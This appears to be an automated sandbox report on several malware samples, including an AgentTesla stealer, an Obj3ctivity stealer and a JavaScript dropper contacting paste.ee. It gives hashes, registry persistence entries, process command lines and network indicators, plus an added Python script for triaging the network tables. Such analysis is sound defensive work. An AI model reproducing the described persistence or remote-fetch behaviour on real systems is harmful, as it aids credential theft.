SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1400-11-0x00007FF989030000-0x00007FF989AF1000-memory.dmp

memory/1400-12-0x00007FF989030000-0x00007FF989AF1000-memory.dmp

memory/716-15-0x0000000002320000-0x0000000002356000-memory.dmp

memory/716-16-0x0000000005010000-0x0000000005638000-memory.dmp

memory/716-17-0x0000000004D80000-0x0000000004DA2000-memory.dmp

memory/716-18-0x0000000004E20000-0x0000000004E86000-memory.dmp

memory/716-19-0x0000000004F00000-0x0000000004F66000-memory.dmp

memory/716-27-0x0000000005640000-0x0000000005994000-memory.dmp

memory/716-30-0x0000000005C50000-0x0000000005C6E000-memory.dmp

memory/716-31-0x0000000005C80000-0x0000000005CCC000-memory.dmp

memory/1400-32-0x00007FF989033000-0x00007FF989035000-memory.dmp

memory/716-33-0x0000000007550000-0x0000000007BCA000-memory.dmp

memory/716-34-0x00000000061C0000-0x00000000061DA000-memory.dmp

memory/1400-35-0x00007FF989030000-0x00007FF989AF1000-memory.dmp

memory/716-36-0x0000000006F70000-0x0000000007006000-memory.dmp

memory/716-37-0x00000000062F0000-0x0000000006312000-memory.dmp

memory/716-38-0x0000000008180000-0x0000000008724000-memory.dmp

C:\Users\Admin\AppData\Roaming\Magtkampens.Bib

MD5 8dd5eb68685e339e1651cbeefd0b235f
SHA1 cef3800a21bf4b8142333629fe685d1107c1ffa5
SHA256 5cf4b171cfc0ad5166bc8be93b41bcebe53aa1c1194a054271201dcbe48c84d1
SHA512 83d40812894f1fc3d03aca47686776fc6361a1fa52fe2f11ef22c2952c6b65d7422c34b47cbd61d37e77a3048358de2ee3ffc3ab67990d15abf3ca71c8d55b97

memory/716-40-0x0000000008730000-0x000000000ABBB000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20241023-en

Max time kernel

119s

Max time network

120s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\bbb50d99d2286fd78099998d4b3f17e441927cfa1e3951893e7acecf77fee1d5.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\bbb50d99d2286fd78099998d4b3f17e441927cfa1e3951893e7acecf77fee1d5.js

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 104.21.84.67:443 paste.ee tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.22.5.218:80 www.microsoft.com tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

136s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\bbb50d99d2286fd78099998d4b3f17e441927cfa1e3951893e7acecf77fee1d5.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\bbb50d99d2286fd78099998d4b3f17e441927cfa1e3951893e7acecf77fee1d5.js

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 172.67.187.200:443 paste.ee tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 200.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 66.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 202.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Running = "C:\\Users\\Admin\\AppData\\Roaming\\Running\\Running.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4928 set thread context of 5004 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe

"C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 68.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 219.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 202.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
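
Most rows in the table above are PTR queries (the in-addr.arpa names carry the octets of an IPv4 address in reverse order), and only two are actual outbound connections: api.ipify.org over 443 and ip-api.com over 80, both public-IP lookup services that match the "Looks up external IP address via web service" signature. The script below is an added example, not part of the report: it parses rows in the table's own format, decodes each PTR name back to the address it asks about, and separates PTR queries that merely mirror an observed TCP peer from the rest. SAMPLE_TABLE is a subset copied from the rows above plus the single mDNS row from the Linux analysis later in this report; the list of IP-lookup services is a curated assumption (only the first three appear anywhere in this report), and treating the unmatched PTR queries as background noise is an analyst judgement rather than something the report states.

```python
"""Separate real destinations from resolver noise in a sandbox Network table.

Added example; not part of the report. SAMPLE_TABLE is copied from rows in
the report; IP_LOOKUP_SERVICES is a curated assumption, and labelling the
unmatched PTR queries "background" is an analyst judgement.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass

# Web services stealers query to learn the victim's public IP. Assumption:
# only the first three occur in this report.
IP_LOOKUP_SERVICES = {"api.ipify.org", "ip-api.com", "whatismyipaddressnow.co",
                      "checkip.dyndns.org", "icanhazip.com"}


@dataclass(frozen=True)
class NetRow:
    country: str
    dest_ip: str
    dest_port: int
    domain: str
    proto: str


def parse_rows(text: str) -> list[NetRow]:
    """Parse 'Country Destination Domain Proto' rows; Domain may be absent."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.split()
        if not parts or parts[0] == "Country":
            continue  # blank line or header
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        else:
            continue
        ip, _, port = dest.rpartition(":")
        rows.append(NetRow(country, ip, int(port), domain, proto.lower()))
    return rows


def ptr_to_ip(name: str) -> str | None:
    """Decode an in-addr.arpa name (octets reversed) back to the IPv4 it asks about."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ipaddress.AddressValueError:
        return None


def triage(rows: list[NetRow]) -> dict:
    """Group rows into TCP peers, forward lookups, and PTR lookups, splitting
    the PTRs by whether the decoded IP is an observed TCP peer."""
    tcp = [r for r in rows if r.proto == "tcp"]
    peer_ips = {r.dest_ip for r in tcp}
    dns = [r for r in rows if r.proto == "udp" and r.dest_port == 53]
    ptr = {ptr_to_ip(r.domain) for r in dns} - {None}
    forward = sorted({r.domain for r in dns if r.domain and ptr_to_ip(r.domain) is None})
    return {
        "destinations": sorted({(r.dest_ip, r.dest_port, r.domain) for r in tcp}),
        "ip_lookup_services": sorted({r.domain for r in tcp if r.domain in IP_LOOKUP_SERVICES}),
        "forward_lookups": forward,
        "ptr_explained": sorted(ptr & peer_ips),   # mirror an observed TCP peer
        "ptr_background": sorted(ptr - peer_ips),  # no matching connection in the table
    }


# Subset of the rows above, plus the mDNS row from the Linux analysis in
# this report to exercise the empty-Domain case.
SAMPLE_TABLE = """
Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
"""

if __name__ == "__main__":
    for key, value in triage(parse_rows(SAMPLE_TABLE)).items():
        print(f"{key}: {value}")
```

On the sample rows the two PTR names 152.74.67.172 and 1.112.95.208 decode to 172.67.74.152 and 208.95.112.1, the very peers already listed for api.ipify.org and ip-api.com, so they add no indicator; the remaining PTRs (8.8.8.8 and two Microsoft ranges here) have no matching connection and should be checked against the full table before being blocked or reported as C2.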

Files

memory/4928-10-0x0000000003FF0000-0x0000000003FF4000-memory.dmp

memory/5004-11-0x0000000000580000-0x00000000005C2000-memory.dmp

memory/5004-12-0x000000007431E000-0x000000007431F000-memory.dmp

memory/5004-13-0x0000000005230000-0x00000000057D4000-memory.dmp

memory/5004-14-0x0000000004BF0000-0x0000000004C56000-memory.dmp

memory/5004-15-0x0000000074310000-0x0000000074AC0000-memory.dmp

memory/5004-18-0x00000000061C0000-0x0000000006210000-memory.dmp

memory/5004-19-0x00000000062B0000-0x0000000006342000-memory.dmp

memory/5004-20-0x0000000006240000-0x000000000624A000-memory.dmp

memory/5004-21-0x000000007431E000-0x000000007431F000-memory.dmp

memory/5004-22-0x0000000074310000-0x0000000074AC0000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20240903-en

Max time kernel

117s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe"

Signatures

Detects Obj3ctivity Stage1

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Obj3ctivity family

obj3ctivity

Obj3ctivity, PXRECVOWEIWOEI

stealer obj3ctivity

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe

"C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 1472

Network

Country Destination Domain Proto
US 8.8.8.8:53 whatismyipaddressnow.co udp
US 104.21.71.78:443 whatismyipaddressnow.co tcp

Files

memory/2780-0-0x00000000749CE000-0x00000000749CF000-memory.dmp

memory/2780-1-0x00000000009F0000-0x0000000000A04000-memory.dmp

memory/2780-2-0x00000000749C0000-0x00000000750AE000-memory.dmp

memory/2780-3-0x00000000749C0000-0x00000000750AE000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

141s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af.rtf" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af.rtf" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 66.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.32.7:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 7.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.16.34.120:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 120.34.16.2.in-addr.arpa udp
US 8.8.8.8:53 11.66.18.2.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/3516-0-0x00007FF971250000-0x00007FF971260000-memory.dmp

memory/3516-1-0x00007FF9B126D000-0x00007FF9B126E000-memory.dmp

memory/3516-3-0x00007FF971250000-0x00007FF971260000-memory.dmp

memory/3516-2-0x00007FF971250000-0x00007FF971260000-memory.dmp

memory/3516-5-0x00007FF971250000-0x00007FF971260000-memory.dmp

memory/3516-4-0x00007FF971250000-0x00007FF971260000-memory.dmp

memory/3516-7-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-6-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-9-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-11-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-12-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-10-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-13-0x00007FF96F1F0000-0x00007FF96F200000-memory.dmp

memory/3516-14-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-15-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-16-0x00007FF96F1F0000-0x00007FF96F200000-memory.dmp

memory/3516-21-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-19-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-22-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-18-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-20-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-17-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-8-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

memory/3516-40-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-41-0x00007FF9B126D000-0x00007FF9B126E000-memory.dmp

memory/3516-42-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-45-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDDE66.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

130s

Command Line

[/tmp/68f3f6a8e2c034cfa63a5083aa214e6973ec425313e52d78ce5f4360e00d9867.elf]

Signatures

N/A

Processes

/tmp/68f3f6a8e2c034cfa63a5083aa214e6973ec425313e52d78ce5f4360e00d9867.elf

[/tmp/68f3f6a8e2c034cfa63a5083aa214e6973ec425313e52d78ce5f4360e00d9867.elf]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A